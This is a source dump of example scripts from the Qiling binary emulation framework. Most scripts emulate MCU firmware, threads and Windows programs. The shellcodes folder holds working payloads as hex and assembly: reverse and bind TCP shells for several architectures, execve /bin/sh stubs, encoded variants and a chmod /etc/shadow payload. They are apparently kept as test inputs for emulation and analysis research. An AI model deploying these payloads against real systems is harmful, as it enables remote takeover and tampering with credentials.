syscall fstat will ignore it if return -1 18 | return -1 19 | 20 | def close(self): 21 | return 0 22 | 23 | if __name__ == "__main__": 24 | ql = Qiling(["rootfs/x86_linux/bin/x86_fetch_urandom"], "rootfs/x86_linux") 25 | ql.add_fs_mapper("/dev/urandom", Fake_urandom()) 26 | ql.run() 27 | -------------------------------------------------------------------------------- /examples/mcu/gd32vf103_blink.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("../..") 8 | 9 | from qiling.core import Qiling 10 | from qiling.const import QL_VERBOSE 11 | from qiling.extensions.mcu.gd32vf1 import gd32vf103 12 | from qiling.const import QL_ARCH, QL_OS 13 | 14 | 15 | ql = Qiling(['../rootfs/mcu/gd32vf103/blink.hex'], archtype=QL_ARCH.RISCV64, ostype=QL_OS.MCU, 16 | env=gd32vf103, verbose=QL_VERBOSE.DEBUG) 17 | 18 | ql.hw.create('rcu') 19 | ql.hw.create('gpioa').watch() 20 | ql.hw.create('gpioc').watch() 21 | 22 | delay_cycles_begin = 0x800015c 23 | delay_cycles_end = 0x800018c 24 | 25 | 26 | def skip_delay(ql): 27 | ql.arch.regs.pc = delay_cycles_end 28 | 29 | 30 | ql.hook_address(skip_delay, delay_cycles_begin) 31 | ql.hw.gpioc.hook_set(13, lambda : print('Set PC13')) 32 | 33 | ql.run(count=20000) 34 | -------------------------------------------------------------------------------- /examples/mcu/stm32f407_gpio_hook.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("../..") 8 | 9 | from qiling.core import Qiling 10 | from qiling.const import QL_VERBOSE 11 | from qiling.extensions.mcu.stm32f4 import stm32f407 12 | from qiling.hw.external_device.oled.ssd1306 import PyGameSSD1306Spi 13 | from qiling.const import QL_ARCH, QL_OS 14 | 15 | 16 | ql = Qiling(["../rootfs/mcu/stm32f407/ai-sine-test.elf"], 17 | archtype=QL_ARCH.CORTEX_M, ostype=QL_OS.MCU, env=stm32f407, verbose=QL_VERBOSE.DEFAULT) 18 | 19 | ql.hw.create('rcc') 20 | ql.hw.create('pwr') 21 | ql.hw.create('flash interface') 22 | ql.hw.create('gpioa') 23 | ql.hw.create('gpiob') 24 | ql.hw.create('gpiod') 25 | ql.hw.create('spi1') 26 | ql.hw.create('crc') 27 | ql.hw.create('dbgmcu') 28 | 29 | oled = PyGameSSD1306Spi(dc=(ql.hw.gpiod, 5)) 30 | ql.hw.spi1.connect(oled) 31 | 32 | def indicator(ql): 33 | ql.log.info('PA7 set') 34 | 35 | ql.hw.gpioa.hook_set(7, indicator, ql) 36 | ql.hw.systick.ratio = 1000 37 | 38 | ql.run(count=800000) 39 | -------------------------------------------------------------------------------- /examples/mcu/stm32f407_mnist_oled.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("../..") 8 | 9 | from qiling.core import Qiling 10 | from qiling.const import QL_ARCH, QL_OS, QL_VERBOSE 11 | from qiling.extensions.mcu.stm32f4 import stm32f407 12 | from qiling.hw.external_device.oled.ssd1306 import PyGameSSD1306Spi 13 | 14 | 15 | ql = Qiling(["../rootfs/mcu/stm32f407/mnist.bin", 0x8000000], 16 | archtype=QL_ARCH.CORTEX_M, ostype=QL_OS.MCU, env=stm32f407, verbose=QL_VERBOSE.DEFAULT) 17 | 18 | ql.hw.create('rcc') 19 | ql.hw.create('gpiod') 20 | ql.hw.create('spi1') 21 | ql.hw.create('crc') 22 | ql.hw.create('dbgmcu') 23 | 24 | oled = PyGameSSD1306Spi(dc=(ql.hw.gpiod, 5)) 25 | ql.hw.spi1.connect(oled) 26 | 27 | ql.hw.systick.ratio = 1000 28 | 29 | ## a temporary method 30 | def hook_smlabb(ql): 31 | ql.arch.regs.r3 = ql.arch.regs.r2 + ql.arch.regs.r1 * ql.arch.regs.r3 32 | ql.arch.regs.pc = (ql.arch.regs.pc + 4) | 1 33 | 34 | ql.hook_address(hook_smlabb, 0x8007a12) 35 | ql.hook_address(hook_smlabb, 0x8007b60) 36 | 37 | ql.run() 38 | -------------------------------------------------------------------------------- /examples/mcu/stm32f411_dma_logger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("../..") 8 | 9 | from qiling.core import Qiling 10 | from qiling.const import QL_ARCH, QL_OS, QL_VERBOSE 11 | from qiling.extensions.mcu.stm32f4 import stm32f411 12 | 13 | 14 | def stm32f411_dma(): 15 | ql = Qiling(["../rootfs/mcu/stm32f411/dma-clock.hex"], 16 | archtype=QL_ARCH.CORTEX_M, ostype=QL_OS.MCU, env=stm32f411, verbose=QL_VERBOSE.DEBUG) 17 | 18 | ql.hw.create('usart2').watch() 19 | ql.hw.create('dma1').watch() 20 | ql.hw.create('rcc') 21 | 22 | ql.run(count=200000) 23 | buf = ql.hw.usart2.recv() 24 | 25 | # check timestamp 26 | tick = [int(x) for x in buf.split()] 27 | for i in range(1, len(tick)): 28 | assert (4 <= tick[i] - tick[i - 1] <= 6) 29 | 30 | 31 | if __name__ == "__main__": 32 | stm32f411_dma() 33 | -------------------------------------------------------------------------------- /examples/mcu/stm32f411_freertos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("../..") 8 | 9 | from qiling.core import Qiling 10 | from qiling.const import QL_ARCH, QL_OS, QL_VERBOSE 11 | from qiling.extensions.mcu.stm32f4 import stm32f411 12 | 13 | 14 | def stm32f411_freertos(): 15 | ql = Qiling(["../rootfs/mcu/stm32f411/os-demo.hex"], 16 | archtype=QL_ARCH.CORTEX_M, ostype=QL_OS.MCU, env=stm32f411, verbose=QL_VERBOSE.DEBUG) 17 | 18 | ql.hw.create('usart2').watch() 19 | ql.hw.create('gpioa').watch() 20 | ql.hw.create('rcc') 21 | 22 | ql.hw.systick.set_ratio(100) 23 | ql.run(count=200000) 24 | 25 | 26 | if __name__ == "__main__": 27 | stm32f411_freertos() 28 | -------------------------------------------------------------------------------- /examples/mcu/stm32f411_gpio_hook.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("../..") 8 | 9 | from qiling.core import Qiling 10 | from qiling.const import QL_ARCH, QL_OS, QL_VERBOSE 11 | from qiling.extensions.mcu.stm32f4 import stm32f411 12 | 13 | 14 | def test_mcu_gpio_stm32f411(): 15 | ql = Qiling(["../../examples/rootfs/mcu/stm32f411/hello_gpioA.hex"], 16 | archtype=QL_ARCH.CORTEX_M, ostype=QL_OS.MCU, env=stm32f411, verbose=QL_VERBOSE.DEBUG) 17 | 18 | ql.hw.create('usart2').watch() 19 | ql.hw.create('rcc').watch() 20 | ql.hw.create('gpioa').watch() 21 | 22 | ql.hw.gpioa.hook_set(5, lambda: print('LED light up')) 23 | ql.hw.gpioa.hook_reset(5, lambda: print('LED light off')) 24 | 25 | ql.run(count=10000) 26 | 27 | 28 | if __name__ == "__main__": 29 | test_mcu_gpio_stm32f411() 30 | -------------------------------------------------------------------------------- /examples/mcu/stm32f411_interact_usart.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | 7 | import time 8 | import threading 9 | 10 | import sys 11 | sys.path.append("../..") 12 | 13 | from qiling.core import Qiling 14 | from qiling.const import QL_ARCH, QL_OS, QL_VERBOSE 15 | from qiling.extensions.mcu.stm32f4 import stm32f411 16 | 17 | 18 | ql = Qiling(["../../examples/rootfs/mcu/stm32f411/md5_server.hex"], 19 | archtype=QL_ARCH.CORTEX_M, ostype=QL_OS.MCU, env=stm32f411, verbose=QL_VERBOSE.OFF) 20 | 21 | ql.hw.create('usart2') 22 | ql.hw.create('rcc') 23 | 24 | threading.Thread(target=lambda : ql.run(count=-1)).start() 25 | 26 | while True: 27 | message = input('>> ').encode() 28 | 29 | ql.hw.usart2.send(message + b'\n') 30 | 31 | time.sleep(0.8) 32 | print(ql.hw.usart2.recv()) 33 | -------------------------------------------------------------------------------- /examples/mcu/stm32f411_spi_oled12864.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("../..") 8 | 9 | from qiling.core import Qiling 10 | from qiling.const import QL_ARCH, QL_OS, QL_VERBOSE 11 | from qiling.extensions.mcu.stm32f4 import stm32f411 12 | from qiling.hw.external_device.oled.ssd1306 import PyGameSSD1306Spi 13 | 14 | 15 | ql = Qiling(['../rootfs/mcu/stm32f411/oled12864.hex'], 16 | archtype=QL_ARCH.CORTEX_M, ostype=QL_OS.MCU, env=stm32f411, verbose=QL_VERBOSE.DEFAULT) 17 | 18 | ql.hw.create('rcc') 19 | ql.hw.create('gpioa') 20 | ql.hw.create('gpiob') 21 | ql.hw.create('gpioc') 22 | ql.hw.create('spi1') 23 | 24 | oled = PyGameSSD1306Spi(dc=(ql.hw.gpioc, 7)) 25 | 26 | ql.hw.systick.ratio = 2000 27 | 28 | ql.hw.spi1.connect(oled) 29 | ql.run(count=1000000) 30 | -------------------------------------------------------------------------------- /examples/mem_invalid_access.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | import sys 6 | sys.path.append("..") 7 | 8 | from qiling import Qiling 9 | from qiling.const import QL_VERBOSE 10 | 11 | def mem_crash(ql: Qiling, access: int, address: int, size: int, value: int): 12 | print(f'got crash') 13 | 14 | PAGE_SIZE = ql.mem.pagesize 15 | aligned = ql.mem.align(address) 16 | 17 | # map the entire page containing the invalid address and fill it with 'Q's 18 | ql.mem.map(aligned, PAGE_SIZE) 19 | ql.mem.write(aligned, b'Q' * PAGE_SIZE) 20 | 21 | if __name__ == "__main__": 22 | ql = Qiling(["rootfs/x8664_linux/bin/mem_invalid_access"], "rootfs/x8664_linux", verbose=QL_VERBOSE.DEBUG) 23 | 24 | ql.hook_mem_invalid(mem_crash) 25 | ql.run() 26 | -------------------------------------------------------------------------------- /examples/multithreading_arm64_linux.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | def my_sandbox(path, rootfs): 13 | ql = Qiling(path, rootfs, verbose=QL_VERBOSE.DEBUG, multithread=True) 14 | ql.run() 15 | 16 | if __name__ == "__main__": 17 | my_sandbox(["rootfs/arm64_linux/bin/arm64_multithreading"], "rootfs/arm64_linux") 18 | -------------------------------------------------------------------------------- /examples/multithreading_mips32_linux.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | def my_sandbox(path, rootfs): 13 | ql = Qiling(path, rootfs, verbose=QL_VERBOSE.DEBUG, multithread=True) 14 | ql.run() 15 | 16 | if __name__ == "__main__": 17 | my_sandbox(["rootfs/mips32_linux/bin/mips32_multithreading"], "rootfs/mips32_linux") 18 | -------------------------------------------------------------------------------- /examples/multithreading_mips32el_linux.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | def my_sandbox(path, rootfs): 13 | ql = Qiling(path, rootfs, verbose=QL_VERBOSE.DEBUG, multithread=True) 14 | ql.run() 15 | 16 | if __name__ == "__main__": 17 | my_sandbox(["rootfs/mips32el_linux/bin/mips32el_multithreading"], "rootfs/mips32el_linux") 18 | -------------------------------------------------------------------------------- /examples/multithreading_x86_windows.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | 11 | if __name__ == "__main__": 12 | ql = Qiling(["rootfs/x86_windows/bin/MultiThread.exe"], "rootfs/x86_windows") 13 | ql.run() 14 | -------------------------------------------------------------------------------- /examples/netgear_6220.ql: -------------------------------------------------------------------------------- 1 | [OS32] 2 | mmap_address = 0x774bf000 3 | -------------------------------------------------------------------------------- /examples/ntQuerySystemInfo_x86.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | 11 | if __name__ == "__main__": 12 | ql = Qiling(["rootfs/x86_windows/bin/NtQuerySystemInformation.exe"], "rootfs/x86_windows", libcache=True) 13 | ql.run() 14 | -------------------------------------------------------------------------------- /examples/regdemo_x86_windows.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | def my_sandbox(path, rootfs): 13 | ql = Qiling(path, rootfs, verbose=QL_VERBOSE.DEBUG) 14 | ql.run() 15 | 16 | if __name__ == "__main__": 17 | my_sandbox(["rootfs/x86_windows/bin/RegDemo.exe"], "rootfs/x86_windows") 18 | -------------------------------------------------------------------------------- /examples/scripts/dylibcollector.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | cp /usr/lib/dyld examples/rootfs/x8664_macos/usr/lib/; 3 | cp /usr/lib/libSystem.B.dylib examples/rootfs/x8664_macos/usr/lib/; 4 | cp /usr/lib/libc++.1.dylib examples/rootfs/x8664_macos/usr/lib/; 5 | cp /usr/lib/libc++abi.dylib examples/rootfs/x8664_macos/usr/lib/; 6 | cp /usr/lib/libobjc.A.dylib examples/rootfs/x8664_macos/usr/lib/; 7 | cp -r /usr/lib/system examples/rootfs/x8664_macos/usr/lib/; 8 | if [ -d /usr/lib/closure ]; then 9 | cp -r /usr/lib/closure examples/rootfs/x8664_macos/usr/lib/; 10 | fi 11 | 12 | #if [ ! -d examples/rootfs/x8664_macos/System/Library/Kernels ]; then 13 | # mkdir -p examples/rootfs/x8664_macos/System/Library/Kernels; 14 | #fi 15 | #wget -O examples/rootfs/x8664_macos/System/Library/Kernels/kernel.development https://github.com/qilingframework/rootfs/raw/master/x8664_macos/System/Library/Kernels/kernel.development; 16 | 17 | 18 | #find /usr/lib -type d -exec mkdir -p examples/rootfs/x8664_macos{} \; 19 | #find /usr/lib -type f -name "*.dylib" -not -name "libobjc.A.dylib" -exec install -v {} examples/rootfs/x8664_macos{} \; 20 | -------------------------------------------------------------------------------- /examples/setexit_arm64_linux.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | def run_sandbox(path, rootfs): 13 | ql = Qiling(path, rootfs, verbose=QL_VERBOSE.DEBUG) 14 | ql.run(end=0x7fffb7e98af4) 15 | 16 | if __name__ == "__main__": 17 | run_sandbox(["rootfs/arm64_linux/bin/arm64_hello"], "rootfs/arm64_linux") 18 | -------------------------------------------------------------------------------- /examples/shellcodes/bsd64_tcp_bind_shell.hex: -------------------------------------------------------------------------------- 1 | \x6a\x61\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\xba\xff\x02\xaa\xaa\x80\xf2\xff\x52\x48\x89\xe6\x99\x04\x66\x80\xc2\x10\x0f\x05\x04\x6a\x0f\x05\x04\x1e\x48\x31\xf6\x99\x0f\x05\x48\x97\x6a\x03\x58\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f\x05\x48\xb8\x52\x32\x43\x42\x77\x30\x63\x72\x57\x48\x8d\x3e\x48\xaf\x74\x08\x48\x31\xc0\x48\xff\xc0\x0f\x05\x5f\x48\x89\xd0\x48\x89\xfe\x48\xff\xce\xb0\x5a\x0f\x05\x75\xf7\x99\x04\x3b\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05 -------------------------------------------------------------------------------- /examples/shellcodes/lin32_encoded_execve.hex: -------------------------------------------------------------------------------- 1 | \xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb 2 | -------------------------------------------------------------------------------- /examples/shellcodes/lin32_execve.asm: -------------------------------------------------------------------------------- 1 | xor eax,eax 2 | push eax 3 | push 0x68732f2f 4 | push 0x6e69622f 5 | xchg ebx,esp 6 | mov al,0xb 7 | int 0x80 8 | -------------------------------------------------------------------------------- /examples/shellcodes/lin32_ob_execve.hex: -------------------------------------------------------------------------------- 1 | \x31\xc9\xf7\xe9\x51\x04\x0b\xeb\x08\x5e\x87\xe6\x99\x87\xdc\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68 -------------------------------------------------------------------------------- /examples/shellcodes/lin64_execve.hex: -------------------------------------------------------------------------------- 1 | \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05 -------------------------------------------------------------------------------- /examples/shellcodes/lin64_unknown.hex: -------------------------------------------------------------------------------- 1 | \x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05 2 | -------------------------------------------------------------------------------- /examples/shellcodes/linarm32_tcp_reverse_shell.hex: -------------------------------------------------------------------------------- 1 | \x01\x10\x8f\xe2\x11\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\x0f\x02\x19\x37\x01\xdf\x06\x1c\x08\xa1\x10\x22\x02\x37\x01\xdf\x3f\x27\x02\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x05\xa0\x92\x1a\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\x00\x12\x34\x0a\x00\x02\x02\x2f\x73\x79\x73\x74\x65\x6d\x2f\x62\x69\x6e\x2f\x73\x68\x00 -------------------------------------------------------------------------------- /examples/shellcodes/linarm64_tcp_reverse_shell.hex: -------------------------------------------------------------------------------- 1 | \x42\x00\x02\xca\x21\x00\x80\xd2\x40\x00\x80\xd2\xc8\x18\x80\xd2\x01\x00\x00\xd4\xe6\x03\x00\xaa\x01\x02\x00\x10\x02\x02\x80\xd2\x68\x19\x80\xd2\x01\x00\x00\xd4\x41\x00\x80\xd2\x42\x00\x02\xca\xe0\x03\x06\xaa\x08\x03\x80\xd2\x01\x00\x00\xd4\x21\x04\x00\xf1\x65\xff\xff\x54\xe0\x00\x00\x10\x42\x00\x02\xca\x21\x00\x01\xca\xa8\x1b\x80\xd2\x01\x00\x00\xd4\x02\x00\x04\xd2\x7f\x00\x00\x01\x2f\x62\x69\x6e\x2f\x73\x68\x00 -------------------------------------------------------------------------------- /examples/shellcodes/linarm_chmod_shadow.hex: -------------------------------------------------------------------------------- 1 | \x01\x60\x8f\xe2\x16\xff\x2f\xe1\x78\x46\x12\x30\xff\x21\xff\x31\x01\x31\x0f\x27\x01\xdf\x24\x1b\x20\x1c\x01\x27\x01\xdf\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00\xc0\x46 -------------------------------------------------------------------------------- /examples/shellcodes/linarm_mprotect_egghunter: -------------------------------------------------------------------------------- 1 | \x01\x10\x8f\xe2\x11\xff\x2f\xe1\x6d\x40\x7d\x27\x01\x21\x09\x03\x07\x22\x28\x1c\x01\xdf\x0c\x30\x01\xd1\x6d\x18\xf9\xe7\x6e\x18\x05\x48\x2b\x68\x04\x35\xb5\x42\xf3\xd0\x2c\x68\x98\x42\xf8\xd1\xa3\x42\xf6\xd1\x04\x35\x28\x47\x48\x41\x43\x4b 2 | -------------------------------------------------------------------------------- /examples/shellcodes/linarm_quantum_leap_stub: -------------------------------------------------------------------------------- 1 | \x19\xa0\x8f\x22\x15\xa0\x8f\x32\x0d\x40\xa0\x21\x0d\x40\xa0\x31\x12\x04\x2d\x29\x12\x04\x2d\x39\x02\xa0\xbd\x28\x02\xa0\xbd\x38 2 | -------------------------------------------------------------------------------- /examples/shellcodes/linmips32_tcp_reverse_shell.hex: -------------------------------------------------------------------------------- 1 | \xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20\xf8\xff\xa5\xaf\x01\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09\x01 -------------------------------------------------------------------------------- /examples/shellcodes/linmips_execve.hex: -------------------------------------------------------------------------------- 1 | \xff\xff\x06\x28\xff\xff\xd0\x04\xff\xff\x05\x28\x01\x10\xe4\x27\x0f\xf0\x84\x24\xab\x0f\x02\x24\x0c\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68 2 | -------------------------------------------------------------------------------- /examples/shellcodes/linux_x86_shell_reverse_tcp.asm: -------------------------------------------------------------------------------- 1 | push 0xa 2 | pop esi 3 | xor ebx,ebx 4 | mul ebx 5 | push ebx 6 | inc ebx 7 | push ebx 8 | push 0x2 9 | mov al,0x66 10 | mov ecx,esp 11 | int 0x80 12 | xchg edi,eax 13 | pop ebx 14 | push 0x85cca8c0 15 | push 0x5c110002 16 | mov ecx,esp 17 | push 0x66 18 | pop eax 19 | push eax 20 | push ecx 21 | push edi 22 | mov ecx,esp 23 | inc ebx 24 | int 0x80 25 | test eax,eax 26 | jns 0x48 27 | dec esi 28 | je 0x6f 29 | push 0xa2 30 | pop eax 31 | push 0x0 32 | push 0x5 33 | mov ebx,esp 34 | xor ecx,ecx 35 | int 0x80 36 | test eax,eax 37 | jns 0x3 38 | jmp 0x6f 39 | mov dl,0x7 40 | mov ecx,0x1000 41 | mov ebx,esp 42 | shr ebx,0xc 43 | shl ebx,0xc 44 | mov al,0x7d 45 | int 0x80 46 | test eax,eax 47 | js 0x6f 48 | pop ebx 49 | mov ecx,esp 50 | cdq 51 | mov dh,0xc 52 | mov al,0x3 53 | int 0x80 54 | test eax,eax 55 | js 0x6f 56 | jmp ecx 57 | mov eax,0x1 58 | mov ebx,0x1 59 | int 0x80 60 | -------------------------------------------------------------------------------- /examples/shellcodes/linux_x86_shell_reverse_tcp.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/shellcodes/linux_x86_shell_reverse_tcp.bin -------------------------------------------------------------------------------- /examples/shellcodes/macos64_execve.hex: -------------------------------------------------------------------------------- 1 | \x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x48\x89\xe7\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05 2 | -------------------------------------------------------------------------------- /examples/shellcodes/macos64_tcp_reverse_shell.hex: -------------------------------------------------------------------------------- 1 | \x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F\x05\x49\x89\xC4\x49\xBD\x01\x01\x11\x5C\xFF\xFF\xFF\xFF\x41\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05 2 | -------------------------------------------------------------------------------- /examples/shellcodes/win32_https_download.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/shellcodes/win32_https_download.zip -------------------------------------------------------------------------------- /examples/shellcodes/win32_ob_exec_calc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/shellcodes/win32_ob_exec_calc.bin -------------------------------------------------------------------------------- /examples/shellcodes/win32_ob_exec_calc.hex: -------------------------------------------------------------------------------- 1 | \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\xeb\x26\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\xe8\xd5\xff\xff\xff\x63\x61\x6c\x63\x00 2 | -------------------------------------------------------------------------------- /examples/shellcodes/win32_ob_msg_box.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/shellcodes/win32_ob_msg_box.bin -------------------------------------------------------------------------------- /examples/shellcodes/win32_ob_shell_reverse_tcp.bin: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /examples/shellcodes/win32_shell_reverse_tcp.bin: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /examples/shellcodes/win32_urldownload.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/shellcodes/win32_urldownload.bin -------------------------------------------------------------------------------- /examples/shellcodes/win32_wincalc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/shellcodes/win32_wincalc.bin -------------------------------------------------------------------------------- /examples/shellcodes/win64_ob_msg_box_x64.bin: -------------------------------------------------------------------------------- 